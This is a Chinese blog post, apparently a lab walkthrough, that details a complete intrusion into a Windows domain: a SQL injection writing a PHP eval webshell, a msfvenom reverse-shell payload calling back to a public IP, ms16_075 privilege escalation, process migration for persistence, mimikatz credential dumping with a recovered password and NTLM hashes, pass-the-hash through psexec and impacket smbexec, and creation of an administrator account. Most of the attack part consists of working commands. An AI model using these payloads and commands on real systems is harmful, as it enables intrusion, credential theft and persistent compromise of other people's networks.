msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326457.html

(0)

相关推荐

  • 威海信息港聊天室,威海信息港聊天室:聊天交流分享你的想法

    2019年威海铁人三项世界杯赛暨2019年威海超级铁人三项系列赛本周末就要开赛啦!如果你不能亲临现场观战,没关系!这里有多种观看比赛直播的方式,大家一定不要错过精彩哟! 广播电视直播 威海电视台公共频道(直播时间暂定8:00-13:30) 威海广播新闻综合频道 威海广播交通频道 国际铁联及中铁协 国际铁联直播平台 triathlon onlive 中国铁人三…

    投稿 2023-05-14
  • 侯宝林和常宝华谁的辈分大,侯宝林和常宝华谁厉害

    很多人在争议,侯宝林与同辈的马志明关系如何云云,大多都是吸引眼球的编造之语,加入了过多的主观臆想和猜忌也就影响到了事情本来的真面目。 至于相声演员不和睦这样的事情,有六七成是观众炒起来的,演员也乐见其成,能炒作就说明有热度,有热度就是有流量,有流量就是有收益。相声界的矛盾再大,无非就是捋叶子,充其量算是行业禁忌。 剩下的或是当场骂街了,或是行内人爆出来了(这…

    2022-03-18 投稿
  • 网约车哪个平台赚钱?现在网约车哪个平台赚钱

    有人说跑网约车月入过万,可对于有的司机来说,越跑越亏! 网约车收入的高低是看每天的接单量,和每单金额的多少来定的。每天单量多,金额高,自然就赚钱,但是对于有些地方的司机而言,就不是这样了。 对于一二线城市的司机来说,跑网约车多少都能养家糊口。前提是你每天工作10个小时以上,在线时长也得6个小时以上。如果每天抱着吊儿郎当的态度,一个月干干歇歇,自然是没多少钱赚…

    2022-04-22
  • 微信加小区业主群技巧(如何加小区业主群)

    “微信群”已不是一个新名词。利用微信群这个载体对团队、社区进行管理已不是什么稀罕的事儿,但如何能真正发挥其积极的作用,凝聚社区居民,推动社区事务管理,也不是个简单的事儿。 杏林镇新城社区中的新华城市广场小区,共有248户。居民大多平时都很忙,很少有人关心小区事宜。当遇到小区业委会重大事宜决策征询时,业主大会到会人数都不到三分之一,很多工作无法开展。针对这种状…

    2022-06-01
  • ps牙齿美白怎么操作(ps美白牙齿简单教程)

      大家好,我是小吧呱,今天我又带PS小技巧来了,PS的强大功能相信大家都知道,比如说,眼睛太小了可以修大一点,嘴巴太大了可以修小一点,人太矮了可以修高一点……但是大家都会用吗?今天我教大家一招,把黄牙变白牙,不要再用手捂着笑了,大方地露出你的牙齿吧! 1、在PS中打开一张黄牙照片;   2、打开海绵工具,上面选项栏——模式(去色),流量…

    2021-12-04 投稿
  • 澳门大学内陆录取线多少分?2022澳门大学录取线

    近年来,澳门院校的申请热度不断提升。虽然距离2022年高考还有几个月时间,但是不少同学都在规划升学双保险,以澳门院校为代表的「就近升学热」已经成为疫情环境下很多考生和家长的首选升学途径。 在澳门,本科通常是4年制,不同的学校和专业,学费有所不同。澳门高校每年学费约7-10万澳门币,工商管理、设计类的专业学费会相对比较高。具体各校略有不同,详细情况请参照所申请…

    2022-04-19
  • 国家为什么不取消公摊面积,我国政府为啥支持公摊

      在国内买房子都要有公摊面积,世界上也只有中国才有。房产证上明明是100平米的房子,实际使用面积只有70平米,甚至更低,此举让购房者十分诟病,购房者花了几十万甚至几百万的钱,买来的却是有着公摊面积的房子。于是,大家要求取消公摊面积,按实际套内面积来计算房价的呼声越来越强了。更关键的是,业主要按照房产证上的面积缴纳物业管理费、地暖费用,这让业主又多…

    2022-03-22 投稿
  • 现在开两元店还能挣钱吗(两元店真的赚钱吗)

    走在大街上,我们总能时不时的看到一些两元店,而且总能看到很多人光顾,老板也是忙的不亦乐乎,那么两元店商品价格那么低,他们真的能赚钱吗? 答案是肯定的,无利不起早,如果没有利润,店面肯定也不会开下去,那么我们现在就分析一下两元店的经营模式。 首先来说两元店吸引的消费群体,这种店的消费群体肯定是广大的工薪阶层,对于这些人来说便宜又实惠的商品才是最有吸引力的,而在…

    投稿 2023-02-03
  • 后悔落户天府新区,学历落户天府新区后悔

    最近成都最火爆的地方在哪儿?无疑是天府新区政务服务中心。 自从成都“本科毕业生凭毕业证可以直接落户”新政出台后,天府新区政务服务中心每天几乎都被络绎不绝的办证大部队挤爆。 火辣的7月,地表温度超过50℃,但“热”情显然不够高涨。下午2点过,热至顶峰,天府新区政务服务中心的篮球场里,等待办证的市民弯弯扭扭的排了几圈,“最后头的估计要晒好几个小时。”这阵仗,就问…

    2022-03-15 投稿
  • 想调查一个人的信息怎么查?

    房产证信息包括:房屋人名称、产权证号、登记日期、建筑面积、房屋用途、房屋是否抵押以及是否被查封等等。但是除了房产他项权证人和法律规定以外,其他人不能随意查询。起诉时,需要有明确的被告,在只知道姓名、房产地址的情况下,如何才能查到被告身份信息呢?调取身份信息,一般需要委托律师才可以,顺序如下:1.法院需要明确的被告身份信息等补充材料,律师到法院立案请求开具协助…

    2023-02-09
  • 小生意开什么店好(想干个投资小的生意)

      第1个小生意:收废品。 这个小生意人人都能做,不需要什么资源,也不需要送礼,有个地方存货就可以了,本钱有个一万就能干,只是累点脏点,但是回报非常大。   第2个小生意:开锁的。 这个需要点手艺,但是只要认真学,用不了三个月你就是师傅了,只要你会开锁,会换锁芯,生意来了,一天轻轻松松入个一千没有问题。 第3个小生意:早点摊位。 就是买早…

    2022-01-05
  • 宏基笔记本驱动下载,宏碁电脑网卡驱动在哪

    现在使用笔记本的同学越来越多,但是由于电脑重装系统的原因,导致一些用户没有网络可用,究其根源是没有安装网卡驱动,其实我们可以下载安装笔记本万能网卡驱动来解决这一尬境,下面,小编给大伙带来了安装笔记本万能网卡驱动的图文。 现在越来越多的人都喜欢用wifi上网,不过wifi上网自然是需要无线网卡的。就像显卡、鼠标等硬件需要驱动支持,网卡也是需要驱动的,笔记本电脑…

    2023-06-28